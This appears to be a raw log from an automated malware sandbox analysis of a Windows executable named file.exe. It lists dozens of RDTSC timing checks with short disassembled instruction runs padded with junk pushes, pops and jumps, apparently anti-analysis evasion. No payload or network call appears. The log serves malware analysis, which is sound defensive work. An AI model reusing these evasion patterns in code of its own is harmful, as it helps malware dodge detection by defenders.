Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6DA4E second address: C6DA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6DB9D second address: C6DBA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F568CECBB26h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C78C29 second address: C78C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C78C2D second address: C78C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F568CECBB26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7BAC0 second address: C7BAD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F568CBD42BEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7BAD4 second address: C7BAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7BAE6 second address: C7BAEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C840FA second address: C84116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F568CECBB34h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CD09 second address: C8CD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CD0D second address: C8CD28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F568CECBB30h 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CD28 second address: C8CD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CD33 second address: C8CD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F568CECBB2Eh 0x0000000b popad 0x0000000c jmp 00007F568CECBB2Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CD57 second address: C8CD5E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8B68A second address: C8B68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8B999 second address: C8B99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8B99F second address: C8B9AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8BAF0 second address: C8BAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C99B second address: C8C9A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F568CECBB26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C9A6 second address: C8C9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F568CBD42B6h 0x0000000a jbe 00007F568CBD42B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9186A second address: C9186F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9186F second address: C91892 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F568CBD42C7h 0x00000008 jmp 00007F568CBD42C1h 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F568CBD42B6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9141F second address: C9143A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push esi 0x0000000a jmp 00007F568CECBB2Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9143A second address: C9143F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9143F second address: C9145B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 ja 00007F568CECBB42h 0x0000000d jp 00007F568CECBB2Ch 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2455 second address: CA2492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F568CBD42B6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F568CBD42C6h 0x00000017 popad 0x00000018 pop edx 0x00000019 pushad 0x0000001a jnp 00007F568CBD42BEh 0x00000020 jnc 00007F568CBD42B6h 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2492 second address: CA24A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CECBB2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F128 second address: C9F12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE6C8 second address: CAE6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE6CE second address: CAE6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE6D2 second address: CAE6F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F568CECBB39h 0x0000000b pop ebx 0x0000000c push edi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC73B8 second address: CC73BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC73BC second address: CC73D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F568CECBB33h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC73D7 second address: CC73DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC73DC second address: CC73E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7502 second address: CC752B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 jmp 00007F568CBD42C9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC752B second address: CC7532 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8228 second address: CC822D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC822D second address: CC8263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F568CECBB26h 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007F568CECBB26h 0x00000011 jmp 00007F568CECBB33h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F568CECBB2Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC99C2 second address: CC99E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F568CBD42C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC3C1 second address: CCC3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC3C5 second address: CCC3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC3CB second address: CCC3D5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F568CECBB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC5DC second address: CCC603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jl 00007F568CBD42B6h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC603 second address: CCC636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add dl, 00000009h 0x0000000d push 00000004h 0x0000000f and dl, 00000060h 0x00000012 call 00007F568CECBB29h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007F568CECBB26h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC636 second address: CCC63C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC63C second address: CCC670 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F568CECBB26h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F568CECBB3Ah 0x00000013 jmp 00007F568CECBB34h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007F568CECBB26h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC976 second address: CCC983 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F568CBD42B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC983 second address: CCC9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F568CECBB32h 0x0000000d push ebx 0x0000000e js 00007F568CECBB26h 0x00000014 pop ebx 0x00000015 popad 0x00000016 nop 0x00000017 sub dh, FFFFFFDBh 0x0000001a push dword ptr [ebp+122D25F4h] 0x00000020 cld 0x00000021 push CF741461h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b pop eax 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC9BC second address: CCC9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF80A second address: CCF810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF810 second address: CCF821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF821 second address: CCF841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB38h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF841 second address: CCF845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF845 second address: CCF86E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F568CECBB26h 0x00000008 jmp 00007F568CECBB2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jng 00007F568CECBB26h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF3A8 second address: CCF3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF3AC second address: CCF3B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0E5B second address: 49D0E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0E5F second address: 49D0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0E65 second address: 49D0E6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0E6A second address: 49D0E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0E70 second address: 49D0E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0E42 second address: 49C0E5B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F568CECBB2Bh 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A01B5 second address: 49A0201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d push edi 0x0000000e mov ebx, esi 0x00000010 pop ecx 0x00000011 popad 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 jmp 00007F568CBD42C1h 0x0000001a push dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F568CBD42BDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0BB6 second address: 49C0C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F568CECBB37h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F568CECBB2Bh 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F568CECBB39h 0x00000021 or ecx, 1926F576h 0x00000027 jmp 00007F568CECBB31h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0C1C second address: 49C0C61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F568CBD42C7h 0x00000009 sub cl, FFFFFFAEh 0x0000000c jmp 00007F568CBD42C9h 0x00000011 popfd 0x00000012 mov edi, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0C61 second address: 49C0C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0C65 second address: 49C0C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0C6B second address: 49C0CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F568CECBB2Ch 0x00000009 jmp 00007F568CECBB35h 0x0000000e popfd 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b call 00007F568CECBB30h 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C067E second address: 49C0682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0682 second address: 49C069F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C069F second address: 49C06D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F568CBD42BEh 0x0000000f push eax 0x00000010 jmp 00007F568CBD42BBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C06D5 second address: 49C06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0592 second address: 49C0632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F568CBD42C8h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F568CBD42C1h 0x00000013 sbb cx, FE76h 0x00000018 jmp 00007F568CBD42C1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F568CBD42C0h 0x00000024 xor si, 7398h 0x00000029 jmp 00007F568CBD42BBh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 call 00007F568CBD42C4h 0x00000037 pushad 0x00000038 popad 0x00000039 pop ecx 0x0000003a call 00007F568CBD42C1h 0x0000003f pop edi 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push eax 0x00000047 pop edx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0235 second address: 49D029D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007F568CECBB2Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007F568CECBB34h 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pushfd 0x0000001a jmp 00007F568CECBB2Ch 0x0000001f sub ecx, 29BB30C8h 0x00000025 jmp 00007F568CECBB2Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e pushad 0x0000002f jmp 00007F568CECBB35h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D029D second address: 49D02B3 instructions: 0x00000000 rdtsc 0x00000002 mov bl, BFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F568CBD42BBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D02B3 second address: 49D02DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 517Ah 0x00000007 mov dx, 0B46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F568CECBB38h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10008 second address: 4A1000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1000C second address: 4A10010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10010 second address: 4A10016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10016 second address: 4A1001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1001C second address: 4A1002B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1002B second address: 4A1002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1002F second address: 4A10035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10035 second address: 4A1006F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F568CECBB2Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F568CECBB35h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1006F second address: 4A10074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10074 second address: 4A10091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F568CECBB2Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10091 second address: 4A100A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E0210 second address: 49E0215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0471 second address: 49C0477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
